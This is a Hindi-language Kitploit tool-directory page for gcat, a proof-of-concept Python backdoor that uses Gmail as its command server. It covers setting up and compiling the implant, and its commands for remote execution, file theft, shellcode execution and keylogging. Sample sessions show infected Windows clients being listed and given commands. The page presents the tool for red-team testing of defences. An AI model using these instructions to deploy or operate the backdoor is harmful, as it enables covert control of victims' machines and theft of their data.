Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/byt3bl33d3r/gcat
शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंटरिमोट एक्सेस ट्रोजनArchived
GitHubbyt3bl33d3r/gcat

gcat

एक PoC बैकडोर जो Gmail को C&C सर्वर के रूप में उपयोग करता है

रिपॉजिटरी देखें
1.4k41687 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Gcat

एक गुप्त Python-आधारित बैकडोर जो Gmail को कमांड और कंट्रोल सर्वर के रूप में उपयोग करता है

यह प्रोजेक्ट Benjamin Donnelly के मूल PoC कोड से प्रेरित था

यह PoC कोड है...

... जो संगठनों को इन प्रकार के हमलों के विरुद्ध अपनी सुरक्षा का परीक्षण करने के लिए जारी किया गया था। उन्हें पहचानने के लिए RITA जैसे प्रोजेक्ट देखें।

इस प्रोजेक्ट के अधिक अद्यतन और अनुरक्षित संस्करण के लिए GDog देखें

सेटअप

इसे काम करने के लिए आपको चाहिए:

  • एक Gmail खाता (एक समर्पित खाता उपयोग करें! अपना निजी खाता उपयोग न करें!)
  • खाते की सुरक्षा सेटिंग्स में "Allow less secure apps" चालू करें
  • आपको खाते की सेटिंग्स में IMAP सक्षम करने की भी आवश्यकता हो सकती है

इस रिपो में दो फ़ाइलें हैं:

  • gcat.py एक स्क्रिप्ट जो उपलब्ध क्लाइंट्स की गणना करने और उन्हें कमांड जारी करने के लिए उपयोग की जाती है
  • implant.py वास्तविक बैकडोर जिसे तैनात करना है

दोनों फ़ाइलों में, gmail_user और gmail_pwd वेरिएबल्स को उस खाते के उपयोगकर्ता नाम और पासवर्ड से संपादित करें जिसे आपने पहले सेटअप किया था।

आप शायद Pyinstaller का उपयोग करके implant.py को एक एक्ज़ीक्यूटेबल में कंपाइल करना चाहेंगे।

नोट: implant.py को 32bit Python इंस्टॉलेशन के साथ कंपाइल करने की अनुशंसा की जाती है

उपयोग

root@kitploit:~
                                             dP   
                                             88   
                .d8888b. .d8888b. .d8888b. d8888P 
                88'  `88 88'  `"" 88'  `88   88   
                88.  .88 88.  ... 88.  .88   88   
                `8888P88 `88888P' `88888P8   dP   
                     .88                          
                 d8888P  
                     

                   .__....._             _.....__,
                     .": o :':         ;': o :".
                     `. `-' .'.       .'. `-' .'   
                       `---'             `---'  

             _...----...      ...   ...      ...----..._
          .-'__..-''----    `.  `"`  .'    ----'''-..__`-.
         '.-'   _.--'''       `-._.-'       ''''--._   `-.`
         '  .-"'                  :                  `"-.  `
           '   `.              _.'"'._              .'   `
                 `.       ,.-'"       "'-.,       .'
                   `.                           .'
              jgs    `-._                   _.-'
                         `"'--...___...--'"`

                     ...IM IN YUR COMPUTERZ...

                        WATCHIN YUR SCREENZ

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Meow!

  • एक बार जब आपने बैकडोर को कुछ सिस्टम्स पर तैनात कर लिया है, तो आप list कमांड का उपयोग करके उपलब्ध क्लाइंट्स की जांच कर सकते हैं:
root@kitploit:~
#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86

आउटपुट एक UUID स्ट्रिंग है जो सिस्टम और उस OS को विशिष्ट रूप से पहचानती है जिस पर implant चल रहा है।

  • चलिए एक implant को कमांड जारी करते हैं:
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv

यहाँ हम 90b2cd83-cb36-52de-84ee-99db6ff41a11 को ipconfig /all निष्पादित करने के लिए कह रहे हैं, फिर स्क्रिप्ट jobid आउटपुट करती है जिसका उपयोग हम उस कमांड का आउटपुट प्राप्त करने के लिए कर सकते हैं।

  • चलिए परिणाम प्राप्त करते हैं!
root@kitploit:~
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv     
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


Windows IP Configuration

        Host Name . . . . . . . . . . . . : unknown-2d44b52
        Primary Dns Suffix  . . . . . . . : 
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

-- SNIP --
  • यही इसका मुख्य सार है! लेकिन आप और भी बहुत कुछ कर सकते हैं, जैसा कि आप स्क्रिप्ट के उपयोग से देख सकते हैं! ;)

करने योग्य कार्य

  • मल्टी-प्लेटफ़ॉर्म समर्थन
  • फ़ाइलें अपलोड करने का कमांड
  • ट्रांसपोर्ट क्रिप्टो और ऑब्सफस्केशन
टूल डाउनलोड करें